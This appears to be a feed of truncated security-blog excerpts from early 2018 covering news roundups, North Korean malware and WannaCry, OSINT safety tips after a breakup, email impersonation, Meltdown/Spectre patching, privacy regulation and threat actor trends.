	2018-02-16 14:00:00	Things I Hearted this Week 16th Feb 2018 (lien direct)	Rolling in the bounty We hear a lot about bug bounties and how some people are potentially making a lucrative living off it. HackerOne has paid out over $24m in bounties in the last five years. That’s some serious cash, considering how far that translates into local currencies. So, they asked some of their top hackers how they spent their money. How hackers spend their bounties \| HackerOne SIM hijacking, the aftermath In last week’s roundup there was a story about SIM swapping and how T-mobile USA was sending texts to customers stating they may be victims of fraud. We often cover such stories, shake our heads and tut loudly before moving on. But Motherboard got in touch with nine victims of SIM hijacking and told their stories. It’s quite a wake-up call to the real-life impact scams and fraud can have on individuals. ‘I Lived a Nightmare:’ SIM Hijacking Victims Share Their Stories \| Motherboard Cryptocurrencies Not entirely security related news, but hey if everyone is referring to it as ‘crypto’ I can include it here right? Joseph Steinberg considers what the future holds for Bitcoin, which sits at the head of the table of cryptocurrencies today, while other currencies are nipping at its heels. Will Bitcoin become the MySpace of Cryptocurrencies? \| Joseph Steinberg Another cryptocurrency theft Italian Cryptocurrency Exchange BitGrail Lost $170 Million Worth of Nano to Hackers \| InterestingEngineering Mining stuff There are lessons to be learned from government websites serving cryptocurrency miners \| Virus Bulletin Could Bitcoin break the NHS? Latest crypto-jack attack ‘the first of many’, say experts \| Express AI recognition Chinese police are wearing sunglasses that can recognize faces. No, that’s not a plot of a movie, but what’s actually happening. Railway police in Zhengzhou, a central Chinese city, are the first in the country to use facial-recognition eyewear to screen passengers during the Lunar New Year travel rush. The devices have allegedly already helped nab seven fugitives related to major criminal cases such as human trafficking and hit-and-runs, and 26 others who were traveling with fake identities. While that may be well and good, there are some issues with facial recognition. Joy Ruolamwini, a researcher at the M.I.T. media lab, has shown how real-life biases can creep into A.I. The result is that for a white man, facial		NotPetya Wannacry
	2018-02-15 14:00:00	North Korean Cyber-Attacks and Collateral Damage (lien direct)	WannaCry was incredibly destructive. The attackers made about $150,000 - but the total damage caused by WannaCry has been estimated in the billions of dollars. There is strong evidence linking WannaCry to a group of hackers known as ‘Lazarus’, reportedly operating out of the DPRK (North Korea). Whilst WannaCry is perhaps the most famous attack by Lazarus, it isn’t the only ‘collateral damage’ caused by the DPRK’s cyber actions. Below we disclose new details on three attacks that have spread out of control. Two likely originating from the DPRK - and one targeting the DPRK. The Voice of Korea and the Rivts Virus This section describes a piece of malware that may have been created within the DPRK as part of a test project - and accidentally leaked out onto the wider internet. A simple file-infector We triage many millions of malicious files automatically every day in an effort to ensure our customers are covered from new threats. One malware family we regularly see, called Rivts by antivirus vendors, was originally created in 2009 but still continues to spread. Rivts is a file-infecting worm - it spreads across USB drives and hard drives attaching itself to files to spread further. The new files we see everyday are the result of new files being infected with the original worm from 2009 - not new developments by the attacker. Overall, it’s a fairly boring file infector (or “virus”). But there was one very strange thing that caught our eye. North Korean Software As part of its initial infection process, Rivts checks for the presence of system files normally found on Windows XP to infect first. But it seems to expect two pieces of uncommon software in the Windows System folder: Below are the details of these two files, nnr60.exe and hana80.exe: Whilst the DPRK is well known for developing its own Linux based operating system, and there is evidence of some DPRK hackers using		NotPetya Wannacry Yahoo APT 38
	2018-02-14 14:00:00	Tips To Avoid LOVE-INT On Valentine\'s Day (lien direct)	Valentine’s Day; that ever-venerated holiday celebrating human love. On a day festooned with pink hearts, mushy card exchanges, chalky candies and proclamations of undying love both for lovers and classmates alike, one thing most people try to avoid is thinking about their history of romance with people who are no longer in their life. The only problem is that occasionally, those exes don’t necessarily stop thinking about their exes. Occasionally, abusive exes become a problem and when they do, it helps to take some appropriate steps to protect yourself immediately after a breakup to prevent them from using Open Source INTelligence (OSINT) to spy on you, or otherwise make your life difficult. Strategy When deciding how best to avoid OSINT that can be used to harass you in the future, it can help to break up the recorded details of your life into two broad categories; things you can hide/change, and things you can’t/or are difficult to hide or change. For the sake of this post, we will only be dealing with things that we have easy, online or physical control over. As always, it’s best to consult your threat models and apply reasonable measures to avoid whatever threats your particular ex may pose to you. Scrubbing public profiles is the first, easiest way to ensure that you aren’t sabotaging your own effort to avoid contact. Some simple steps you can take to increase your OPSEC include: Change all of your account passwords ASAP — If your instincts label someone as dangerous enough to alter publicly available information about yourself, it’s likely that their behavior follows a pattern that existed while you were together with them. Assuming close and personal contact with someone often means that you make exceptions to your threat models that allow them into close personal contact with both you and your devices. Never underestimate the lengths an untrustworthy ex-boyfriend or girlfriend will go to in order to snoop on you, so it’s best at minimum to ensure your passwords are in a controlled state. While you’re doing this, be sure to sign out of all other points of access for any given service. Revoke private keys and generate new key pairs — Physical access to electronic assets lends itself to theft of sensitive information that you may be holding to protect your communications, such as PGP keys. If you suspect that your keys may have been compromised, it never hurts to revoke and regenerate keys just to be safe. On the subject of keys, re-keying your door locks and changing garage door codes can be a good way of re-establishing your physical security, and reclaiming confidence that your environment is untouched while you’re gone. Secure crypto-coin wallets — Along with PGP keys, coin wallets are another source of electronic information, meant to be kept private that can easily be compromised by someone who knows what they want, knows where to find it, and has implicit access to the location they are kept. With ever increasing links between electronic and financial security, if one is compromised the other may be as well. Consider fresh installs of your operating systems and factory-resets of your phone — This may seem a little extreme, but especially good idea if your devices were ever left alone with your formerly-beloved for any amount of time long enough to exploit. A back doored phone or notebook would be a prime, continuing source of love-INT and in this post-FlexiSpy world, where commodity spyware is more accessible than ever to
	2018-02-12 14:00:00	Global Cybersecurity Concerns in 2018 (lien direct)	People around the world are becoming increasingly connected with smart devices. Sending and receiving massive amounts of data back and forth, we rely on the transfer and storage of data on a daily basis. Hackers and cyber attackers know this and know how steal data for their profit. Your job as an information security specialist is to defend your company’s data, implementing preventative and protective measures and monitoring your data and systems. With the increasing amount of data businesses and its customers are producing comes an increasing number of people maliciously trying to obtain it. In 2017, we saw increases in ransomware attacks, financial fraud and massive data breaches. It was a busy year for security practitioners, and 2018 will be no different, with new global regulations, redesigned threats to new devices, and ways to combat those threats. Let’s take look at some cybersecurity issues every InfoSec specialist should be aware of in the coming months of 2018. Upcoming Requirements of the GDPR The General Data Protection Regulation is the European Union’s way of protecting its citizens’ data by holding organizations and companies accountable in practices of security personnel in regards to sensitive information. As of May 25, 2018, companies will risk severe fines if they are not in compliance with the GDPR data protection rules. In an effort to minimize the damage done during recent data breaches, rules will be implemented on how you and your company obtain and secure data, as well as notifying users of the breach immediately. Under the GDPR, companies will rely on their IT security specialists to: Be given explicit consent when obtaining customer data. Be clear and upfront with customers in how they’ll obtain this data in language that is accessible and easy to understand. Comply with data protection officers who will inventory data in the EU, including outside company data that pertains to goods and services held within the EU. In the event of a breach, notify the public within 72 hours or be penalized. The EU isn’t the only geography implementing privacy measures for its citizens. Australia implemented privacy regulations recently as well. The Liabilities of IoT In a day and age where humans are increasingly integrating the internet into their day-to-day lives, we have no choice but to submerge ourselves in the internet of things (IoT). This includes the business world as well. Mobile devices have become a necessity and a network of connected smartphones, tablets and other smart devices has made it considerably easier for businesses to access information from the internet and communicate. It also has made it considerably easier for hackers to get their hands on the same information — which is, in turn, making it harder and harder on the InfoSec practitioner. For usability purposes, nearly everything can be connected to Wi-Fi. A company’s smart coffee pot can be connected to an iPhone for a convenient cu
	2018-02-09 14:00:00	Things I Hearted this Week 9th Feb 2018 (lien direct)	Much of this week’s news cycles were dominated by Space X successfully launching the Falcon Heavy rocket into space. Putting aside concerns of the cost, the feasibility, or other criticisms, it was just nice to see something positive and optimistic grab the headlines for a change. But that doesn’t mean the intergalactic world of cyber security sat quietly, oh no, we’ve got a whole bunch of things to talk about, so let’s jump right in. The House That Spied on Me By far one of the most engaging pieces I’ve read in a while is this Gizmodo article by Kashmir Hill and Surya Mattu on what happened when they decided to connect a whole bunch of “smart” devices in her apartment, and monitored what data was being collected and sent by these devices. The house that spied on me \| Gizmodo Related Your TV is probably tracking you -- here's how to stop it \| Cnet Boffins crack smartphone location tracking – even if you've turned off the GPS \| The Register Amazon Says Don't Worry About This Raspberry Pi Key Hack -- But Is Fixing It Anyway \| Forbes Ethereum Scammers make $5,000 in a night “Online scammers have made over $5,000 worth of Ethereum in one night alone, showing how gullible some cryptocurrency users can be. Miscreants achieved this by creating fake Twitter profiles for real-world celebrities and spamming the social network with messages tricking users to participate in "giveaways." Crooks deceived users into sending a small amount of Ethereum, promising they would receive the sum ten times over as part of the giveaway. All the messages followed the same pattern, even if the sums and Ethereum wallet addresses varied between the fake Twitter accounts.” Ethereum Scammers Make $5,000 in a Night by Impersonating Celebs on Twitter \| Bleeping Computer Hunting Insecure Direct Object Reference Reading bug bounty reports where the researchers recount their steps are probably some of my favourite types of posts where I always end up learning something new. And this by Mohammed Abdul Raheem is no different. Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (part 1) \| Codeburst.io Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART 2) \| Codeburst.io Privacy down under While all eyes have been on GDPR, the Ozzies don’t want to be left behind as the Office of the Australian	Guideline
	2018-02-08 14:00:00	How Dangerous are Impersonation Attacks? (lien direct)	Amongst the types of cyber attacks happening, impersonation attacks are an interesting evolving category. Such attacks are generally targeted at corporate employees. The attack is executed by sending an email to the target in which the sender attempts to masquerade as a trusted source. This is done in order to gain access to target’s sensitive information, such as financial data. The U.S. Federal Bureau of Investigation (FBI) has warned businesses about this growing threat and has estimated that such attacks have caused losses of approximately $5.3 billion globally. A common example of impersonation attacks is Business Email Compromise (BEC) or "CEO fraud" that continues to manipulate companies by using false identities. This can severely damage a company’s reputation. This blog from last year explains BEC in detail. Why are Impersonation Attacks Hard to Detect? The major reason these attacks are difficult to be detected by users is ignorance and lack of attention to detail. Let’s understand this through an example: Below is the same email address written twice, how fast can you spot the one with some error? eeryaeel@reveantivirus.com eeryaeel@reventivirus.com It is hard to figure out the irregularity, especially when you have a hectic schedule at work and many distractions. How are Impersonation Attacks Constructed? Finding the Target With the help of social engineering techniques, attackers look for potential victims. Facebook, LinkedIn and Twitter profiles are easiest mediums for attackers to collect information about their target. Name, email address, school, job title, short bio, job duties, location, etc. can be easily fetched by attackers from target’s social media accounts. Social engineering, which requires very little technical skill, can typically get attackers an unbelievable amount of information about the victim, freely available online. Creating Credibility Now, as the attacker has a significant amount of the target’s information in hand, the next step is to build credibility. Again, social engineering is an effective way to set the stage for the attack. The attacker will try to figure out who to impersonate. It could be the victim’s boss, one of his colleagues or someone close to him. Close friends can be found on Facebook, and people tend to be very trusting if they think they are dealing with close friends. Through the company website and social media pages, the attacker can easily pick the person to impersonate. Executing the Attack The final and the most important step is to choose a type of attack. Below mentioned are top 3 tactics used by attackers: By Registering a Look-Alike Email Domain The attacker can register a similar email domain and create a new email ID using a similar name to the person being impersonated. The attacker sends an email message to the target asking them to respond urgently. For instance, impersonating the target’s boss, the attacker creates an email id Smith@reventivirus.com and asks the victim to make urgent payment for an invoice attached with the message. Editing the Display Name The majority of the mobile email clients only show the display n		Yahoo
	2018-02-07 14:00:00	How to Handle Meltdown and Spectre: Patch, But Don\'t Rush It (lien direct)	Welcome to 2018. If you’re still catching up, one of the first things on your radar is probably Meltdown and Spectre — two massive CPU vulnerabilities that have sent the security and broader tech world spinning. There is plenty of additional data to be found about the actual technologies involved and the likely attacks that will probably follow, but baseline what you need to know is that there is a flaw in one of the ways that Intel uses to improve the performance of their chips. If you want a comprehensive technical view, including some descriptions of PoC’s of potential exploits, take a look at the original Google Project Zero post. If you are looking for something a little higher level, that includes more actionable pointers, I’d recommend this clear guide to Meltdown and Spectre patches. As for this post, I’m not going to provide another analysis of Meltdown and Spectre, and I’m also not going to pass judgement. I’m mainly concerned with what organizations are doing to defend themselves. Despite all the press and publicity (a Google query for “meltdown and spectre” yielded nearly three million entries after only 14 days) there has been little in the way of solid recommendations to blunt the impact of the problem. Microsoft has provided patches to block access to vulnerable operations, but these are offered with warnings about side effects and potentially disruptive software interactions. Similarly, Intel has released, then issued warnings on, firmware updates that were intended to help. There is an overarching sense of confusion about the right next steps, especially around the right timing to adopt these remediations. Seeing this, we kicked off a quick survey to find out how people were coping, and whether this critical and noisy problem was spurring rapid response, or whether those measures were being impacted by some of these negative reports. If you haven’t yet decided exactly what to do, you are not alone. Across the set of respondents, 95% of whom are directly responsible for security updates, only 21% had applied the Microsoft patch to more than 75% of their systems. Most of them, 51%, had patched less than a quarter of their systems, and 61% acknowledged that they were aware that these patches could cause adverse interactions with other products. This does not need to be the fire drill it may currently feel like The best advice for dealing with this situation is to recognize that the changes that major firms like Microsoft, Oracle, Apple, and others had to make are serious modifications to low-level system behaviors — changes that may impact their own performance, or that of other applications. These second-order consequences can be nearly as damaging as any eventual attack that exploits these flaws, particularly if widespread updates cause intermittent or widespread downtime. This event provides security leaders with the opportunity to show balance. A knee-jerk reaction is to instantly apply the patches when available, cleaning up the fall-out as it happens. But why? Currently	Guideline
	2018-02-06 14:00:00	Debunking these 3 Domain Name Registration Myths Once and For All (lien direct)	Let’s be honest: Domain names suck. It’s a pain to come up with possible variations. It’s time-consuming to sift through which are available (none are). And going through the process of buying an unavailable one is about as much fun as a root canal. But there’s a reason they’re such a hassle. There’s a lot riding on them. There’s a massive difference between a good one and a great one. Many times, that difference is millions or billions. That sounds like an exaggeration, but it’s not. Here’s why. Myth #1. Domain Registrations Increase SEO Exact match domains (EMDs) used to be a thing (or still are, depending on who you talk to). You stuffed a few keywords into the domain before checkout to give yourself that extra edge to rank for cut-throat queries like “bestvitaminshop.com.” Domain age has also been rumored to influence rankings. Somehow, the older the domain and the longer you register it for tells Google… to like you more? Admittedly, the logic is flimsy. But Google originally debunked these myths in 2009, according to some digging by Matt McGee at Search Engine Land. First, they had a Google Webmaster Help forum thread where Googler, John Mueller, addressed this question head-on: “A bunch of TLDs do not publish expiration dates — how could we compare domains with expiration dates to domains without that information? It seems that would be pretty hard, and likely not worth the trouble. Even when we do have that data, what would it tell us when comparing sites that are otherwise equivalent? A year (the minimum duration, as far as I know) is pretty long in internet-time :-).” Next up, they had former Google PR chief, Matt Cutts, on the record several times addressing this issue: “To the best of my knowledge, no search engine has ever confirmed that they use length-of-registration as a factor in scoring. If a company is asserting that as a fact, that would be troubling.” So there you have it. “Officially,” domain registrations don’t affect SEO. At least, not directly. Recently, there’s some evidence that search engine result page (SERP) click-through rate (CTR) affects rankings. One experiment had a sizable group of people click on a random listing in the seventh position to see what (if any) changes occurred. And within just a few hours? Straight to the top. (image source) The finding shows an odd correlation between SERP performance and its influence on ranks. The point of this being that it is possible that a better domain name, one that’s more credible and interesting for people to click, could indirectly influence rankings. The industry standard .com domain is still seen as the most credible, even though new top-level domains (TLDs) continue to pop up and gain acceptance. Studies have backed this up, showing that .com domains generally dr		APT 19
	2018-02-05 14:00:00	Australian Privacy Act Gets New Notification Requirements (lien direct)	With GDPR the focus of many press headlines across the world, you’d think it was the first and only regulation covering the privacy of individuals! However, privacy regulations exist in numerous countries around the globe, and anyone in Australia or its territories will be all-too familiar with the Australian Privacy Act 1988 (which, for simplicity, I'll just refer to as 'the Privacy Act' from this point forward). Governed by the Office of the Australian Information Commissioner (OAIC), the Privacy Act introduces 13 Privacy Principles (known as Australian Privacy Principles, or APPs) that guide how the personal information of Australian subjects must be managed. Failure to protect personal information is deemed, “...an interference with the privacy of an individual,” with financial penalties that can go up to AUD$360,000 for individuals, and up to AUD$1.8M for organizations. What’s top of mind for many who are subject to the Privacy Act is a new amendment -- the Privacy Amendment (Notifiable Data Breaches) Act of 2017. Inspired by the proliferation of personal information stored in electronic form, such as social media content, healthcare records, and more, the amendment acknowledges the increasing risk (and occurrences) relating to breaches of that data. Starting 22 February 2018, the amendment introduces the Notifiable Data Breaches (NDB) scheme. This requires organizations to notify individuals of an ‘eligible data breach,’ which is defined as when BOTH the following conditions are met: An individual’s personal information has been subject to unauthorized access, disclosure, or loss; and The breach is likely to result in serious harm to that individual. Who Needs To Comply with the Australian Privacy Act? The Privacy Act applies to all Australian government agencies, businesses, and non-profit organizations with an annual turnover of more than AUD $3 million. In addition, small businesses and organizations with an annual turnover less than AUD$3 million who fall into the following categories must also comply with the Privacy Act: Private sector health service providers including: Traditional healthcare providers (hospitals, day surgeries, medical practitioners, pharmacists, health professionals). Complementary thera
	2018-02-02 14:00:00	Things I Hearted this Week, 2nd Feb 2018 (lien direct)	January 2018 finds itself in the rear view mirror, which probably means I can’t wish Happy New Year to anyone I haven’t spoken to since December. But if I haven’t spoken to someone for that long, I do begin to question why I even bother speaking to them at all… One thing I don’t ever stop to question though is what’s going on in the world of security, so let’s take a look back over the most newsworthy items to come across my virtual desk. Password manager vulnerabilities You may remember a few weeks ago where Freedom to Tinker published findings about two scripts that exploit browsers built-in login managers to retrieve and exfiltrate ID’s. The most commonly-asked question on the back of that was “which password managers should I use?”. Luckily, my friend Adrian Sanabria has done the legwork for you and compiled a list of password managers across different browsers and whether they leak credentials or not. Password Manager Vulnerability Silently Giving Up Credentials \| Threatcare The follower factory A very well researched and presented piece by the NYTimes on the business of buying fake followers, what it means to those that buy it, the companies which broker fake identities, and the impact to social media platforms. The follower factory \| NYTimes Somewhat related Here’s why the epidemic of malicious ads grew so much worse last year \| ars technica Who will pay for Spectre? Probably you What do Toblerone and Brexit have in common with Spectre? A whole lot more than you may think. Who will pay for Spectre? Probably you \| Owen Rogers, Medium GDPR Even my spellcheck knows not to question me whenever I type GDPR these days. But that’s not to say it isn’t a topic which generates good discussion. Two pieces that recently caught my eye were: Things to consider before publishing an article about GDPR \| Rowenna Fielding / LinkedIn Data Protection, Security, and the GDPR: A fuzzy and fraught relationship \| Infospectives The great crypto-currency rush Whether you believe that cryptocurrencies are a bubble, or the next big thing in online payments, there is no denying that it is a hot commodity at the moment. So much so, that criminals are putting a lot of effort into trying to illegally gain a slice of the crypto-pie. The attacks come from a variety of angles. A criminal was able to steal about $150,000 by tricking Experty users into sending their
	2018-02-01 14:00:00	Mitigating Blockchain Analysis: Mixing Cryptocurrency (lien direct)	Cryptocurrency and Blockchain Analysis Cryptocurrency is a digital currency, and it comes in many forms, built upon varying Blockchain technologies. Bitcoin is the original cryptocurrency, created in 2009 by cypherpunk Satoshi Nakamoto. Since then, many new alternative cryptocurrencies have been created, popular alternatives are Litecoin, Ethereum, and Monero. Samuel Falkon had it right when he said that “cryptocurrencies are a dream for privacy and freedom lovers because they restore transacting power back to whom it belongs — individuals who have a right to control their own money.” While cryptocurrency is a great advancement for a cypherpunk’s dream of privacy, it still comes with its own set of flaws that allow for deanonymization through Blockchain analysis and off-chain analysis. Bitcoin is often thought to be an anonymous solution for digital transactions, but this simply is not true. Every time a transaction is made, the technical details of said transaction becomes a public record on the Blockchain. The Blockchain is a public ledger that holds a history of all transactions ever made, thus leaving the potential for analysis of said transactions. Blockchain analysis services include: https://www.walletexplorer.com https://chainalysis.com https://scorechain.com https://blockseer.com https://coinalytics.co https://sabr.io https://elliptic.co http://numisight.com And many more More recently, The Bitfury Group released a whitepaper for their new Blockchain analysis algorithm with the goal of identifying the users behind digital transactions, dubbing their deanonymization solution as a “Bitcoin clustering” algorithm. Bitcoin address clustering is self-described as “a process that exposes bitcoin users by determining which addresses belong to a single user through an analysis of Blockchain data. The act of clustering groups those addresses together, enabling investigators to link them to a single entity.” (The Bitfury Group Unveils Solution For Analyzing Related Bitcoin Addresses, The Bitfury Group) The Bitfury Group’s analysis research should not be shocking to us. They perform Blockchain analysis, just as we should expect adversaries to do. The innovative part of this algorithm is that they are also analyzing publicly available information on the web, or as they call it “off-chain tag collection” to aid their clustering algorithm. There are two tag collection approaches that The Bitfury Group takes: passive and active. Off-chain tag collection for clustering, passive tag collection: The passive approach includes crawling the web for publicly available information, typically on
	2018-01-31 14:00:00	Threat Detection in a Changing Market: A Conversation with AlienVault MSSP Partner Sword & Shield (lien direct)	Recently, I had a chance to speak with Jason Graf, director of managed security services for Sword & Shield Enterprise Security, a top Managed Security Services Provider (MSSP) based in Knoxville, Tennessee. We talked about the evolving threat landscape and the challenges associated with detecting and analyzing ransomware and other emerging threats on a daily basis. Graf started the discussion by providing context around Sword & Shield’s business, which has been protecting critical data for mid-to-large-sized companies for more than 20 years. The company started focusing on managed security services five years ago as attacks became more sophisticated and burdensome for companies. The MSSP’s core business is to provide 24/7 detection and response capabilities against cyber threats for its customers. “Sword & Shield combines expert analysts, proprietary processes, and advanced technology to protect our clients around the clock, 365 days a year. We take this responsibility seriously, so we only use technology that is up to the task.” Graf went on to explain that Sword & Shield’s managed security services also helps companies to achieve industry compliance. “Compliance is a key driver of our services, particularly for companies in the healthcare and retail industries that need to satisfy regulatory and industry requirements.” Graf said the Sword & Shield team of security analysts monitor from 1,000 to 20,000 assets per customer environment - every day. That’s a lot of assets! Not only are there more assets than ever to monitor today, but security threats are also getting more complex and harder to detect. Sword & Shield relies on AlienVault® Unified Security Management® (USMTM) to detect and analyze their customers’ threats. USM includes built-in security controls and continuous threat intelligence updates from AlienVault Labs to simplify threat detection and incident response. A unified approach to security monitoring eliminates the need for Sword & Shield to manage multiple solutions, saving them time and money. Sword & Shield also leverages threat intelligence updates from AlienVault’s Open Threat Exchange® (OTXTM), which monitors emerging threats from all over the world. By leveraging USM and OTX, Sword & Shield can focus on delivering value to their customers through threat detection and SOC data analysis to more rapidly grow their managed security services. Graf likes the comprehensiveness of USM as compared to other security solutions. He explained that it goes well beyond just providing traditional capabilities of SIEM and log management. “While other providers offer point solutions, AlienVault’s USM provides a holistic, unified solution with essential capabilities including intrusion detection and vulnerability management.” For Sword & Shield, pinpointing where hacker command and control communications are before they are used for malicious activities is important. The MSSP can consolidate their alarms, vulnerabilities and configuration issues into a single view through USM Central, our threat management console available with the USM platform. A consolidated view of the threats detected in their end customer environments enables Sword & Shield to work more efficiently and respond more quickly to any security incidents detected.
	2018-01-30 13:40:00	OTX Trends Part 3 - Threat Actors (lien direct)	By Javvad Malik and Chris Doman This is the third of a three part series on trends identified by AlienVault in 2017. Part 1 focused on exploits and part 2 addressed malware. This part will discuss threat actors and patterns we have detected with OTX. Which threat actors should I be most concerned about? Which threat actors your organization should be most concerned about will vary greatly. A flower shop will have a very different threat profile from a defense contractor. Therefore below we’ve limited ourselves to some very high level trends of particular threat actors below- many of which may not be relevant to your organisation. Which threat actors are most active? The following graph describes the number of vendor reports for each threat actor over the past two years by quarter: For clarity, we have limited the graph to the five threat actors reported on most in OTX. This is useful as a very rough indication of which actors are particularly busy. Caveats There are a number of caveats to consider here. One news-worthy event against a single target may be reported in multiple vendor reports. Whereas a campaign against thousands of targets may be only represented by one report. Vendors are also more inclined to report on something that is “commercially interesting”. For example activity targeting banks in the United States is more likely to be reported than attacks targeting the Uyghur population in China. It’s also likely we missed some reports, particularly in the earlier days of OTX which may explain some of the increase in reports between 2016 and 2017. The global targeted threat landscape There are a number of suggested methods to classify the capability of different threat actors. Each have their problems however. For example – if a threat actor never deploys 0-day exploits do they lack the resources to develop them, or are they mature enough to avoid wasting resources unnecessarily? Below we have plotted out a graph of the threat actors most reported on in the last two years. We have excluded threat actors whose motivation is thought to be criminal, as that wouldn’t be an apples to apples comparison. Both the measure of their activity (the number of vendor reports) and the measure of their capability (a rough rule of thumb) are not scientific, but can provide some rough insights: A rough chart of the activity and capability of notable threat actors in the last year Perhaps most notable here is which threat actors are not listed here. Some, such as APT1 and Equation Group, seem to have disappeared under their existing formation following from very public reporting. It seems unlikely groups which likely employ thousands of people such as those have disappeared completely. The lack of such reporting is more likely a result of significantly changed tactics and identification following their outing. Others remain visibly active, but not enough to make our chart of “worst offenders”. A review of the most reported on threat actors The threat actor referenced i		APT 38 APT 28 APT 10 APT 3 APT 1 APT 34
	2018-01-29 14:00:00	Hackers Using AI? An Increase in the FUD Factor (lien direct)	It’s hard to envision hackers, whether skiddies, APTs, or anything in between, using any sort of artificial intelligence (AI) or machine learning (ML) to attack a target network. Despite the availability of these sophisticated technologies, the most simplistic attack tactics continue to work. Enterprises aren’t patching known vulnerabilities; freely available malware can run in memory un-detected; users continue to click on links they receive in email or allow macros on that innocent-looking office document; and internal network logs are often not collected and even more rarely kept for any period. if these methods work, why would adversaries turn to more complex solutions like AI or ML? Looking back on 2017, perhaps the biggest takeaway is that the most obvious methods still work. Adversaries seek the greatest mission gain with the lowest amount of resources expended and equities exposed. For example, Equifax wasn’t pwned by a fancy ZeroDay exploit or an insider with a USB drive; PII on millions of consumers wasn’t culled from S3 buckets because Amazon’s infrastructure was hacked by an APT; WannaCry wasn’t the result of a ZeroDay vulnerability; and people (amazingly) clicked Yes to download an update to Adobe Flash, giving us BadRabbit! Sticking with what works continues to pay off for all adversaries, irrespective of their resources, motives or intent. So, what’s with the fear mongering over hackers using AI and ML to attack their targets? AI (by which I mean both Machine Learning and AI in general) is the gift that keeps on giving. Most in the InfoSec community agree that AI has its place in the defense of the enterprise. The problem is that few people understand how AI works or how to best apply it, and many cybersecurity companies take advantage of this situation by making fancy sounding claims about the number of models they apply to the data or the types of mathematics they use to generate results. These claims generally go hand-in-hand with a dark-themed user interface with some sort of spinning globe or pew-pew map. And while defenders work to sift through the marketing blather and outrageous claims about cybersecurity products that use AI, some in the security world take further advantage, and extend the FUD further: what could be better to sow fear and confusion than claiming that hackers are now using AI to attack your network? The more observant in the InfoSec community have noticed that this language tends to originate with companies that stand to profit on the very same FUD that permeates the market. This FUD spreading takes on a few different forms, often by way of polls, as in, how many people believe hackers will use AI. There’s been a few of these polls where more than 50 percent of the respondents agree that this is a real threat. For the life of me, I can’t understand why. The other way is through companies that make the claim. This comes in the form of sponsored posts on various InfoSec news sites, or interviews with company executives. There have been claims made about adversaries detected and intrusions executed using AI; while this may come to pass in the future, it’s incredibly unlikely any time soon. There are simply too many ways for adversaries to attack networks and accomplish their objectives using far more simplistic and less risky tactics. An adversary who has mastered the use of AI in their operations would only use it for the hardest of the hard targets, and even then, they’re likely to find an easier way to achieve their objective. Yet, it’s important to note that the academic and security-minded research into hackers use of AI is real, and important. Adversarial machine learning is one angle. This work is important; it helps understand the cap		Wannacry Equifax
	2018-01-26 14:00:00	NY State Department of Financial Services New Cybersecurity Regulation – CISO Attestation Due Feb 15 (lien direct)	The first New York State (NYS) Department of Financial Services (DFS) CISO Attestation is due on February 15th. Last year, the NYS DFS enacted a new cybersecurity regulation that affects all financial companies that conduct business in the State of New York. The regulation is targeted towards financial companies that conduct business in New York State. A "Covered Entity" means any Person operating under or required to operate under a license, registration, charter, certificate, permit, accreditation or similar authorization under the Banking Law, the Insurance Law or the Financial Services Law of the State. A company need not be domiciled in the State to be subject to the regulation. (Very similar to how GDPR is set up.) Financial institutions include banks, money managers, and insurance companies. There are exceptions, but they are quite limited (based on institutional income and employee count). The impact of this regulation is very broad. In previous articles, I discussed the evolution of the regulation, as well as some of the important milestones that must be achieved in order to achieve compliance with the regulation. The first milestone date passed back in August, and now, the next important milestone is looming whereby the designated CISO of each financial organization must file the first certification of the organization’s compliance with the regulation. The regulation includes the letter that must be filled out and filed with the Department of Financial Services. It is a simple, somewhat inelegant form, but it packs a powerful legal punch in that the CISO is attesting that the regulation is being followed. This means that your organization must have implemented the six items required in the first milestone. The reason why this simple form is so powerful is due to the undefined enforcement powers of the regulation. The exact language states: “This regulation will be enforced by the superintendent pursuant to, and is not intended to limit, the superintendent’s authority under any applicable laws”. To a tech person, those sound like some very broad enforcement powers. One has to wonder if enforcement will be limited to prevention of a non-compliant business from conducting operations in New York, or perhaps they can be as harsh as those prescribed in the GDPR, which becomes effective in May. Cybersecurity has now gone very mainstream and become very serious. Now is a good time to review if your organization has stayed on track with the regulation’s milestones. Please also note that the next milestone is March 1st. Many of us in the InfoSec community anticipated that this new era of cybersecurity regulation was on the way. However, now is not the time for any “I told you so” smugness. Remember, it is our job to guide organizations about how to meet the requirements of these new regulations. Remember, if you are not the CISO, then you are probably responsible for making the CISO’s job easier. Let your expertise lead	Guideline
	2018-01-25 14:00:00	When Bad Language Happens To Good Systems (lien direct)	In my last blog, I wrote about how words are created and then become mainstream over time, and how that time is longer for normal words, and shorter for words used to describe things in tech. But it’s not always a straightforward nor does it always land in the correct place. To illustrate, I give you, “on premise” versus “on premises”; a battle that has happened to every company that’s ventured into the Cloud (which is a whole other language discussion we’ll have some other time). In 2013, Brian Madden fired the first shot of the linguistic resistance to the term “on premise”: And then, after much discussion, in 2014, he conceded defeat. “I'm saddened that the industry seems to have adopted the grammatically-incorrect term "on premise" in place of the actual term, "on premises" when discussing where servers will live.” he wrote. He goes on to bemoan the fact that “VMware, Citrix, and Microsoft all preferring the term "on premise" over "on premises" in their official press releases and technical documents.” He continues on to say that “Or maybe this is the evolution of language. It's shortened, perverted, and flexed to evolve with the times. Fine, let's call it linguistic evolution.” Brian, dude. We can do better. This isn’t evolution; this is people being incapable of finding an online dictionary. The Merriam-Webster Online Dictionary, our dictionary of choice here at AlienVault, is pretty clear on the difference between the two terms. Premise: a : a proposition antecedently supposed or proved as a basis of argument or inference; specifically : either of the first two propositions of a syllogism from which the conclusion is drawn b : something assumed or taken for granted : presupposition whereas Premises: a : a tract of land with the buildings thereon b : a building or part of a building usually with its appurtenances (such as grounds) further, On premises: inside a building or on the area of land that it is on Full meals are available at restaurant on premises. No smoking on premises. Tom at The Networking Nerd, a word geek after my own heart, brings us the etymology: The etymology of these two words is actually linked, as you might expect. Premise is the first to appear in the late 14th century. It traces from the Old French premise which is derived from the Medieval Latin premissa, which are both defined as “a previous proposition from which another fo
